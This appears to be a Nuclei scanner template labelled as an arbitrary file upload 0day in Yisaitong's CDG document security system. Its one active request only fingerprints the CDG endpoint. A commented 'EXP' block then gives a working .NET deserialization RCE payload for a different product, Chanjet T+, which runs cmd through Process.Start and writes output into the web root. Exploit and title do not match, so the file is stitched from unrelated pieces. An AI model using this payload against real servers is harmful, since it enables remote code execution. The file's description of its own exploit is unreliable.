id: cdg-decryptapplicationservice2-arbitrary-file-upload

info:
  name: 亿赛通 电子文档安全管理系统 任意文件上传
  author: SleepingBag945
  severity: critical
  description: |
    亿赛通 电子文档安全管理系统 任意文件上传
    目前仍然处于0day状态
  metadata:
  tags: cdg,yisaitong,upload,rce

http:
  - raw:
      - |
        GET /CDGServer3/DecryptApplicationService2 HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Accept-Language: zh-CN,zh;q=0.9

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "Path=/CDGServer3"
        condition: and

      - type: status
        status:
          - 200




# EXP
# POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
# Host: 
# User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
# Connection: close
# Content-Length: 668
# X-Ajaxpro-Method: GetStoreWarehouseByStore
# Accept-Encoding: gzip

# {
#   "storeID":{
#     "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
#     "MethodName":"Start",
#     "ObjectInstance":{
#       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
#       "StartInfo":{
#         "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
#         "FileName":"cmd",
#         "Arguments":"/c whoami > C:/Progra~2/Chanjet/TPlusStd/WebSite/2RUsL6jgx9sGX4GItQBcVfxarBM.txt"
#       }
#     }
#   }
# }
